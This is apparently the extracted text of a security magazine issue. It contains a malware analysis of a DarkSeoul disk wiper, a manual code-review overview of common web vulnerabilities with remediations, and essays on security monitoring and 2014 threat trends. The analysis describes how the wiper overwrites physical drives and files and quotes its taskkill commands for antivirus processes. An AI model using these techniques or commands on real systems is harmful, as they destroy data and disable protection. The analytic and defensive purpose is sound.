Win32:DarkSeoul-C Trojan.Win32.EraseMBR.b

Executive Summary This malware deletes the MBR from the hard drives connected to the system, and it deletes files and folders on windows versions newer than XP. The malware doesn’t modify registry to achieve persistence as the infected machine won’t survive the next reboot. There are no network actives

AbdELRahman Hesham

ITI Cyber Security Student

Issue 18 | Securitykaizen Magazine | 23

Identification MD5

0a8032cd6b4a710b1771a080fa09fb87

SHA256

510f83af3c41f9892040a8a80b4f3a4736eebee2ec4a7d4bfee63dbe44d7ecff

Detection ratio

49 / 56 virus total

Static analysis The sample imports only two dlls (kernel32, ntdll) these are mandatory libraries which are loaded by most of the executables and doesn’t give a hint about the functionality of the sample. But kernel32 library contains functions that allow any executable to load libraries not in the import table, these functions are (LoadLibrary , GetProcAddress )simply the technique works as follow : 1. First the executable sends the name of the required library as an argument to LoadLibrary function which returns a handle to the loaded module if it succeeded. 2. When the library is successfully loaded in memory the executable then calls GetProcAddress function with the required function in the loaded library and the module handle as arguments. 3. Then the executable can call the function using the address which was returned by GetProcAddress function. This technique is used to hide the functionality of the malware, as it cannot be seen during static analysis, especially if the names of the library and the function are obfuscated or encrypted.

Dynamic analysis The code starts with unusual non malicious code-the third instruction calls the fourths instruction and the address saved by the call function which is the address of the fourth instruction is put in EAX. The code then enters a loop to calculate some addresses and store them in the memory (calculating the addresses at runtime hides information from static analysis as the addresses called are not known until the sample is running). The sample calculates 27 addresses and are stores them in memory starting from memory location 004026CC. The code then calls one of the 27 addresses (004023A0).

This function access the FS segment register to reach the TEB. TEB is the thread environment block which contains information about the current running thread. The structure of the TEB is not documented by Microsoft, nevertheless the information we need is available online [http://www.nirsoft.net/kernel_struct/vista/TEB.html]. The function accesses offset 0x30 in the TEB, so we need to know what is at this offset -The first member is a struct (NT_TIB). .This struct contains 6 pointers (every data type starts with P is a pointer). .Pointers in 32 bit executables have size of 4 bytes. .It also contains a union, unions allocate the biggest size of its members, it contains an unsigned long and a pointer both of size 4 bytes. .so the total size of NT_TIB struct is 7 * 4 = 28 bytes - Then there is another 5 pointers (two inside CLIENT_ID structure) of size 5*4 = 20 bytes. 20+28 = 48 bytes (0x30). So the offset 0x30 in the TEB is the Peb according to the unofficial documentation. The function then accesses the offset 0x0C in the PEB structure (documentation of the structure can be found here) The member at offset 0x0C is PPEB_LDR_DATA, a pointer to PEB_LDR_DATA structure Then offset 0x14 in the PEB_LDR_DATA which is a pointer to InMemoryOrderModuleList which is a linked list of LDR_DATA_ TABLE_ENTRY elements. Offset 28 in this structure is not documented but it seems that it gets the name of the loaded module. Then there is a loop that processes the module name to calculate a hash value that is compared with a hardcoded value after the loop. This loop will search for the entry point of kernel32.dll (the calculated value matches the hardcode value) and then the function will return this address. Then the function at 0x004023DD is called twice, to find the address of LoadLibraryA , GetProcAddss functions. Then it will load dlls using the LoadLibraryA function, and find the addresses of the following functions using the function at 0x004023DD: 1. advapi32.OpenProcessToken 2. advapi32.LookupPrivilegeValueA 3. advapi32.AdjustTokenPrivileges 4. kernel32.OpenFileMappingA

Issue 18 | www.bluekaizen.org | 24

5. kernel32.CreateFileMappingA 6. kernel32.GetWindowsDirectoryA 7. kernel32.InitializeCriticalSection 8. kernel32.CreateThread 9. kernel32.WaitForSingleObject 10. ntdll.RtlLeaveCriticalSection 11. kernel32.GetVersionExA 12. kernel32.Sleep 13. kernel32.GetDriveTypeA 14. ntdll.RtlEnterCriticalSection 15. kernel32.FindFirstFileA 16. kernel32.RemoveDirectoryA 17. kernel32.FindNextFileA 18. kernel32.FindClose 19. kernel32.CreateFileA 20. kernel32.WriteFile 21. kernel32.CloseHandle 22. kernel32.DeleteFileA 23. kernel32.SetFilePointer 24. kernel32.GetSystemDirectoryA 25. kernel32.GetDiskFreeSpaceA 26. kernel32.GetDiskFreeSpaceExA 27. kernel32.ReadFile 28. kernel32.WinExec 29. kernel32.GetCurrentProcess 30. ntdll.RtlGetLastWin32Error 31. kernel32.LoadLibraryA 32. kernel32.GetProcAddress Then loads msvcrt.dll 1. msvcrt.strcat 2. msvcrt.memset 3. msvcrt.strcpy 4. msvcrt.memcpy 5. msvcrt.strlen 6. msvcrt.sprintf 7. msvcrt.strcmp 8. msvcrt.malloc 9. msvcrt.free Then user32.dll user32.ExitWindowsEx The function starting at 0x004011BC tries to open a file mapping object named “JO840112-CRAS8468-11150923-PCI8273V”, if it is found the malware will exit. If it didn’t find the file mapping object, it will create one. Then the malware will send the following commands to kernel32.WinExec in order to be executed on the system a. taskkill /F /IM pasvc.exe , which belongs to http://us.ahnlab. com/ b. taskkill /F /IM clisvc.exe , which belongs to ViRobot ISMS from HAURI The function call at 00401242, checks the version of the windows system if it is older than windows vista (windows XP or windows 2003 or older) the malware will create a thread that starts execution at 0x00401AA0 otherwise it will start execution at 0x004012D5.

Issue 18 | Securitykaizen Magazine | 25

On windows XP. Function call at 00401d85 clears a buffer of size 0x104 bytes and the stores the string “\\.\PhysicalDrive0 ” in the buffer. then opens the file \\.\PhysicalDrive0 and uses kernel32. SetFilePointer function to point to the start of the drive,it then reads 512 bytes to a buffer in the heap and the it uses setFilePointer() to advance the file pointer by 0x7000 bytes. Then it starts writing 512 bytes of the word “PR!NCPESP” ,and then sets the file pointer to the beginning of the physical drive and writes again 512 bytes of the word “PR!NCPESP”. It loops to do the same on PhysicalDrive 1 to 9 The malware will sleep for 5 minutes and then will shut down the operating system for the last time.

On operating systems newer than windows XP -Windows 7 for example- the malware creates another thread after destroying the MBR this thread is responsible for deleting files and folders on the hard drive This thread works as follows: 1. it will loop to check all drives from B:\ to Y:\ if it is the drive exists, it will perform another check to see if it is the drive that contains the operating system or not. a. If it contains the operating system then it will store the drive path for usage after the current loop. b. If it is not the drive of the operating system it will process the drive in the loop. 2. The processing of the valid drives is the same for the drive that contains the operating system and the other valid drives, the only difference is that the malware will create a new thread for every valid drive and will process the drive that contains the operating system on the current thread. 3. The processing done on drives (function at address 0x004015ED) is that the malware will traverse the folders in the drives, using findNextFile() method and appends *.* to the current directory path. 4. It overwrites the content of every file with the word “PR!NCPESP” multiple times , and then deletes the file ,making file recovery impossible. 5. It avoids deleting files in c:/program files, c:/program data, and c:/windows. 6. it will create a thread for deep paths (3 nested folders ) After five minutes of the malware will shut down the PC using the following methods: 1. kernel32.WinExec(“shutdown -r -t 0”) 2. user32.ExitWindowsEX()

www.bluekaizen.org

Reviews

Code Review

Manual Source Code Review Overview

Shaikh Rashid

Cyber Security Consultant and Security Researcher

Finding vulnerabilities in any application is a daunting task of a security researchers, these researchers are increasingly engaging with different approach and methodology to hunt down vulnerabilities. Some of the common approach or methodologies are black box testing and white box testing. Black box testing approach is when researcher doesn’t have any working knowledge and background of the application, they have to do enumeration of technologies, mapping of the application and identification of fault entry points, determining input validation vulnerabilities, or logical security vulnerabilities. White box testing involve having source code of the application and having proper understanding of the application as well as its purpose, background, environment and framework to best identify key areas of focus. In software development, a small coding error can result in a critical vulnerability that ends up compromising the security of an entire system or network. Source Code review is probably the single-most effective technique for identifying security flaws. When used together with automated tools and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. This task can be carried out either by some commercial as well as free automated tools or manually review of the code which requires human interaction. Issue 18 | www.bluekaizen.org | 26

Introduction Manual source code review provides insight into the “real risk” associated with insecure code. This is the single most important value from a manual approach. A human reviewer can understand the context for certain coding practices, and make a serious risk estimate that accounts for both the likelihood of attack and the business impact of a breach, Manual source code review is a time taking process but this lengthy process can be shortened up if we know properly which areas to investigate. Although many tools are available but still proper knowledge of manual code review is required

Basics The first and foremost requirement of Code Review is that you should have basic understanding of at least one Object Oriented Framework i.e. J2EE, .net. Knowledge of PHP is also fine.

Application Details

The next and most important step is to understand how the application is working what are the settings in it. Therefore entry point of code review will be deployment descriptor (web.xml in J2EE, web.config in .NET). In web service testing it’s very important to understand the application, what it is doing, what are the business requirements? Analyze behavior of application. Have an idea of data flow. Explore about application and mine out important details such as APIs, libraries used. Note: In PHP there is no configuration file present if no framework is used.

Figure 1: Use of custom pages for error code 404

Remediation Provide a custom error page to avoid leakage of sensitive information. Disable dangerous HTTP methods. Use Get and Post methods to be on a safer side.

3.Listing of HTTP Methods Enabled Under HTTP-method tag you can see the methods enabled (refer Figure 2)

Following is the checklist for code review: •Authentication & Authorization •Cryptography •Respecting boundaries (input validation & output encoding) •Session management •Threat Modeling Terminology •Following are the terminology, which a code reviewer should be aware of, •Trust zone: User of application •Taint: User provided malicious data •Taint propagator: The function taking malicious data as input and without validation passing it out •Source: The point where malicious input was given e.g. request.getparameter() is source •Sink: The place where vulnerability gets executed example the place where xss alerts get reflected

Figure 2: Use of dangerous HTTP methods

4.Data Protection in Storage & Transit The setting in Figure 3 shows that transport guarantee is none which means that there is no HTTPS setting provided in the application. So, anybody can intercept the communication.

1.Configuration Management Study the configuration file (deployment descriptor) properly it will depict a lot about deployment. For example you want to see what HTTP methods are used you can see it in web.xml. In WEB-INF→web.xml is present on viewing it we found the setting as shown in Figure 2.

Figure 3: Transport-guarantee not set properly

Remediation 2.Check out Whether Custom Error Pages are The setting for transport guarantee should be confidential as Defined: shown in Figure 4. If the application developer wants, so he can set a custom error page for error code in web.xml as shown in Figure 1 Issue 18 | Securitykaizen Magazine | 27

6.Hard Coded Password Case. Sometimes developers put hardcoded password in JSP page as comments. In Figure 7 first comment (red marked as 1) is of JSP another is of HTML (marked as 2). The HTML comment is visible on web page (since it is a JSP page so HTML comments won’t work). Even the JSP comments can be viewed by view source

Figure 4: Transport-guarantee setting should be Confidential

5.Hashing of Password A weak hashing algorithm was used for password i.e. SHA1. If you see the code as shown in Figure 5 it seems there is encryption of password (Figure 5), but on opening up of definition of encrypt method of crypto class (Figure 6) we can see hashing of password is done by using SHA, but which SHA algorithm is used that is not known.

Figure 7: Password hard coded as comment

7.Authorization The case of CSRF (bypassing authorization): ‘My profile is better than you because I have updated it’ Sometimes developers have a wrong notion that sending parameters/ session token as a hidden field or obscuring with programming terminologies would save them from eyes of attacker. An example of it can be depicted in following fig (refer Figure 8). Figure 5: SafePass variable storing encrypted value of password

If in instance of messagedigest.getinstance SHA is given then it takes SHA1 by default, the same is happening in this case refer Figure 6. SHA1 is a weak hashing algorithm.

Figure 8: ‘User ID’ passed as hidden parameter.

There is a code for updating of accounts as shown in Figure 9.

Figure 6: SHA for password hash

Remediation A strong hashing algorithm should be used to store password in hashed form. There should be a proper salting of hashed data. The salt used should be different for different user. If you are using some encryption algorithm them they should be strong enough. In coming years if computation resources become cheaper then it may be possible to crack the encryption. Therefore for delaying attacker from decrypting your data you can increase number of iteration of encryption algorithm.

Figure 9: Code for updating profile

The code in the Figure 9 would update an account on basis of ‘userid’, which is a crucial parameter passed as hidden parameter. This coding flaw can be used by an attacker who would make his own webpage having same action of update as that of application; he will also have victim’s session ID, Issue 18 | www.bluekaizen.org | 28

which would update profile of victim. The cause of this attack is a weak authorization process which is updating data on basis of a parameter without validating whether the parameter is coming from a legitimate user or not

Remediation: Use tokens which would help server in identifying its client. In spring framework 3.0 there has been token remedy for CSRF

8.Bypassing authentication:

Another recommendation given by presenter was to remove the burden of validation from developer and put it on secure Frameworks such as spring or some secure APIs. Nowadays there are various APIs and framework available to do the job of input validation and output encoding.

10.Logging & Auditing: Improper Logging Technique: In the below given Figure 12 we can see that the password is logged in as plaintext.

In Figure 10 you can see the session token’s value is stored in a hidden field, which can be easily retrieved by MITM. An attacker can use session token of victim to bypass authentication process and gain an access to the victim’s profile.

Figure 12: Logging of password in plaintext

Figure 10: User ID getting passed as cookie

Remediation: Care should be taken that proper session management is followed. The session token should expire after some time. The session token should be random and long sequence, they should be difficult to guess. The cookie attributes should be properly set.

9.Data Validation: Improper Input Validation. Sometimes many developers use blacklisting technique, which is not a good practice, consider the code displayed in Figure 11. You can see a blacklisting list provided by developer. He is blacklisting script pattern, JavaScript pattern, eval, onload but he has not included onmouseover and many other attack vectors in the list.

Log Obfuscation Another possible scenario can be: User ‘Ak’ logged in at 2:46pm ‘Ak’ is coming as a user input. This logging technique can be used as a tool by attacker by giving input as ‘AD logged in at 2:40pm User Ak’ so the logging string will form as – User ‘AD logged in at 2:40pm User Ak’ logged in at 2:46 pm This will help to cover the tracks of attacker by forging up the logs.

Remediation: The logging should not contain elements coming from user as input, as he can obfuscate the logs by giving malicious input in order to mask his activities. A password should never be logged as plain text.

11.Improper Use of Reflections: What is reflection? Reflection is the ability to examine or modify the properties or behavior of an object at runtime.

Scenario of attack: I am a disgruntled employee, I am resigning, but I have been so much frustrated with my job that I have an intention to harm company without getting caught by logging of application. I create the page as shown in Figure 13.

Figure 11: Use of blacklisting

Remediation: Why not to use white listing? If I am providing validation of phone number textbox then why should I say don’t allow alphabets, special characters instead I can say allow only numbers. Isn’t it simple? Just tell what is valid. Issue 18 | Securitykaizen Magazine | 29

Figure 13: Creation of a malicious class by attacker

In Figure 13 you can see that a class ‘ReflectionandMore‘ is created which has a constructor defined. In the definition of constructor a connection to database is formed and the next step is deletion of some table. This class is not called anywhere in application ,therefore when you run code review tool on it, the tool will not consider it as malicious code and leave it marked as a dead code. Here comes the attack by using reflection as a medium, refer Figure 14. In the figure you can see that the reflection is creating instance of class which is provided as user input(s). So attacker will call this code (Figure 14) and give the malicious class (Figure 13) as input. Thus when the constructor is called, a JDBC connection is made and this will ultimately lead to deletion of table

Remediation: Assume all input is malicious. Use an “accept known good” input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page. When the set of acceptable objects, such as file names or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual file names or URLs, and reject all other inputs.

13.SMTP Server Spamming Case: It is worse to provide hardcoded password of SMTP in code but it is worst case to have no password defined for SMTP server. If anyhow attacker comes to know of it he can use this vulnerability of victim server to spam some other parties’ mail box here web application hosting server will become a medium of attack. In the below given figure we can see that mail is getting send by using open relay SMTP server. Open relay allows anyone on internet to send mail. They are really unpopular as they can be exploited by spamming.

Figure 14: Reflection to call the constructor of malicious class

Remediation: The application should have an authorization check for performing activities such as deletion or manipulation of database. It is suggested that re-authentication should be prompted before performing such action.

12.URL Redirection Case: There are cases when developers make use of a good output encoding mechanism that is c:out to escape injections but sometimes some remedies are applicable for some attacks only. In this case URL has been taken as input of ‘GET’ request parameter by application (refer highlighted section of Figure 15). Even if a developer used quite a good mechanism to escape XSS types of attacks but he forgot to put a check on URL redirection, in such a case an attacker can give URL of his phishing site as input to get request parameter. The resulting URL will be given to victim thus misguiding a legitimate user.

Figure 16: Using open relay SMTP server

Remediation: Provide a strong password for SMTP server, which should not be hardcoded.

Figure 15: URL not getting validated

Issue 18 | www.bluekaizen.org | 30

www.bluekaizen.org

Best Practice

Defining a Proactive Security Monitoring Strategy

About The Author

Harris D. Schwartz Safeway Corporate Information Security Lead, Incident Response & Cyber Threat Intelligence

Issue 18 | Securitykaizen Magazine | 31

An information security professional with 20+ years private sector experience specializing in the development and implementation of world class incident response programs, investigations and cyber threat intelligence programs. Harris is currently the leader for incident response and cyber threat intelligence for Safeway, Inc., one of the largest grocery retail companies in North America

As the realm of cyber security threats continue to change, trend, increase and become targeted in some instances, it’s important for companies to modify or change their defense strategy in alignment with industry trends. In the 20+ years in the corporate and information security industry, working proactively has far better advantages then sitting around and waiting for something to happen. There are still companies today that choose the reactive route because their mindset is either stuck in an old culture that has worked the last number of years or they choose not to know what is happening in their networks and environment In some cases, moving from an entirely reactive state to a proactive approach may still have its internal challenges with peers, your legal department and other groups within the company. It is important as security professionals in a corporation to constantly educate and build awareness with your peers and stakeholders, especially executive leadership and your legal department. When you have built the perfect relationship, or partnership, you will find that they will approach you and ask for your recommended strategy moving forward; essentially as a subject matter expert. It is unfortunate that too many times, I have found peers afraid or scared of their executives or legal professionals. If this happens, making important decisions for your company will take time and by the time you get around to accomplishing what you need to, it will be too late.

So what do I consider to be reactive vs. proactive It is important to operate a SIEM (security information and event manager) tool where all of your various IT appliances and tools (firewalls, IDS/IPS, etc.) send their logs for alerting purposes. Most SIEM infrastructures conduct aggregation and correlation of these logs, and coupled upon further rules, signatures and threat intelligence, can alert your security operations staff about notable security events on your network, which would then require an analyst to review, assess, triage and remediate as necessary. Every company will have reactionary response to events in this nature. This model has been the norm for a long time, and is simply not enough to ensure your network is free of attackers and unauthorized individuals. In some companies and organizations, the security team manages the SIEM 100% while others may augment staff with an MSSP – Managed Security Services

What else is necessary in today’s modern cyber world?

The other 80% of the rule is the proactive approach. What does proactive really mean? It could have different definitions from one person to another. I have always been a fan and proponent of proactive operations. This is one advantage to getting to know, on an intimate scale what is normal activity on your network and plainly, what is not normal. All the small, medium and large scale abnormalities, anomalies and unknowns of the network. How else to figure out what is normal and not, is to dig into your network activity, utilize various technology tools and applications to help support proactive monitoring, run down all anomalies and suspicious

activity, conduct heightened monitoring activity surrounding critical operations and systems in your enterprise, get to know the system administrators and ask questions. I will give you an example. My team was using a known monitoring tool to keep an eye out for any outbound traffic that was deemed suspicious or out of the norm, e.g. beaconing traffic from an internal host to external host or between two internal hosts. This type of activity could be evidence of an internal hoist infection talking to a command and control botnet or other malicious IP address. In this particular example, traffic was communicating between two different internal hosts and some of the traffic was attempting to access a privileged account. In the end, the investigation determined that the although there was traffic between the two hosts, the access attempt to the privileged account was blocked, and on top of it all, the entire event identified known network backup activity that occurs on the network late at night. These were circumstances we didn’t know about, but now we do

Why else is proactive monitoring important?

Well, if your company or entity is one that deals in sensitive information, whether that being nation state secrets, customer personal information (what we call PII in the Americas), credit card and payment data (PCI) and/ or patient and medical data (ePHI). This information in the wrong hands can cripple your company and business, cost you millions, damage your reputation in seconds and bring all sorts of legal troubles to your executives and board members. Proactive monitoring along these lines should be a combination of technology (tools and applications) and human interaction and surveillance of your network environment. Let’s face it, breaches and incidents typically occur when a company least expects. Industry trends showed that most attacks occurred Friday to Sunday, now attackers are taking different approaches to attacks and breaches. While they are deploying malicious code that operates in stealth mode, they still have to exfiltrate your data, in slow and steady moves so that the activity is not “detectable”. This is why security professionals need to take a different stance with regard to cyber security – “Always under attack” or “Imminent Danger” – being aware and proactive will allow companies to observe, identify, prevent and mitigate cyber threats much faster than if they operated in a 100% reactionary stance. In maintaining a proactive strategy also requires good relationships and partnerships among your peers, support groups and stakeholders within your organizations. If you haven’t started building those relationships yet, you should start as soon as you can. The days of keeping to ourselves and within a silo is well over. This approach won’t help but will hinder your efforts. Building a notification list of important people to contact in the organization will only assist in your proactive efforts, and afford you the ability to respond quickly to a real live security incident. Issue 18 | www.bluekaizen.org | 32

www.bluekaizen.org

Best Practice

Information Security Is a Challenge in The Middle East About The Author 10 years of experience in Information Security and Technology. Majorly working with ministries and authorities of Oman. Expert in Information Security Audits, Security Assessments and Digital Forensics 2014 Security Recap

Abdul Rehman

Senior Consultant (IS/IT) Issue 18 | Securitykaizen Magazine | 33

2014 has passed and we have just entered into 2015. If you look 2014 from the prospective of Information Security, the picture is a bit scary. Heartbleed and ShellShock gave surprises to everybody. Giant corporates and big empires spent a lot of man days in evaluation, risk assessments, patching and other activities to make sure their information is secure. Another surprising and shocking thing was the discovery of critical vulnerabilities in OpenSource. These vulnerabilities impacted whole computing world. And then, there were cyber-attacks, whether it is US-China cock-fight/cyber war, its Chinese Vs Russian Hackers, stories of Syrian Cyber Army, “Big Achievements of Anonymous Group� and other hacking incidents have made 2014 a memorable year.

According to the IBM Cyber Security Intelligence Index, an average large company had to filter through 1,400 cyberattacks weekly to identify the 1.7 incidents that can do harm

on computers and mobile devices, representing an increase of almost 10% year-on-year (2013’s figure was 31.6 million). Kaspersky Lab also presented statistics for the Middle East in the first quarter of 2014. The Kingdom of Saudi Arabia has the highest total number of local and online malware detections, closely followed by the United Arab Emirates. Bahrain and Lebanon were the safest countries, according to these statistics, with the region’s lowest threat levels.

Hackers attracted towards Middle East Apart of the well-known names in Cyber-Space like US, China Russia etc, number of cyber-attacks has increased in MiddleEast region in 2014. And it will continue to increase in 2015 as well due to many obvious reasons. A sample of 30 of the world’s largest Fortune 500 companies generated visitor traffic to websites that host malware, with a sharp rise in malware attacks on the Middle East’s oil and gas sector. Various websites of KSA, Oman and UAE were publically defaced in 2014. As the business opportunities are growing in Middle-East region, it means more complex security threats. Businesses across the Middle-East are at high risk, with 65% of the employees having no awareness about information security, Cisco’s recent Middle-East ICT Security Study says.

http://me.kaspersky.com/en/about/news/virus/2014/Kaspersky_Lab_reports_ on_cyber_threats_in_the_Middle_East_in_the_first_quarter_of_2014

Moral of the Story

Information Security should be a board room discussion in 2015. Sheer planning initiatives need to be taken from the top in both government and business sectors. Information Security should not be considered as IT Security only. Steps should be taken for Information Security awareness among the employees.

Points to Ponder

http://me.kaspersky.com/en/about/news/virus/2014/the-number-of-cyberthreats-in-the-Middle-East-continues-to-grow

An annual report by TrendMicro (A security Software Company) says, the top threat in Middle-East is adware, while email reputation queries, also known as spam email, totaled 24 million in the third quarter (Q3) of 2014, including 14 million in Saudi Arabia, 8 million in the UAE, and 2 million in the rest of the Middle East. The region had 1.5 million malware detections in Q3 2014, with online banking malware, ransomware, and malicious websites and mobile apps presenting high risk. According to the report, targeted attacks campaigns will continue to multiply in 2015, after cybercriminals had noteworthy breaches via targeted attacks in the US. As per another report by Kaspersky, altogether in first quarter of 2014 in the Middle East Kaspersky Lab products neutralized more than 34.9 million cyber-attacks and malware infections

It should be made clear this year that information security is critical to today’s business and any compromise on information assets can damage organizations. The key initiative is effective enterprise-wide risk management and awareness. Identify what information needs to be protected? What are the possible risks to your information and how much risk can you accept? What security measures do you need? Do the security measures work after implementation? Be a hard target to exploit and learn from the mistakes which you have made in 2014. May the God of all SECURITY be with you

Issue 18 | www.bluekaizen.org | 34

Issue 18 | Securitykaizen Magazine | 35

Issue 18 | www.bluekaizen.org | 36

Issue 18 | Securitykaizen Magazine | 37

Issue 18 | www.bluekaizen.org | 38

Issue 18 | Securitykaizen Magazine | 39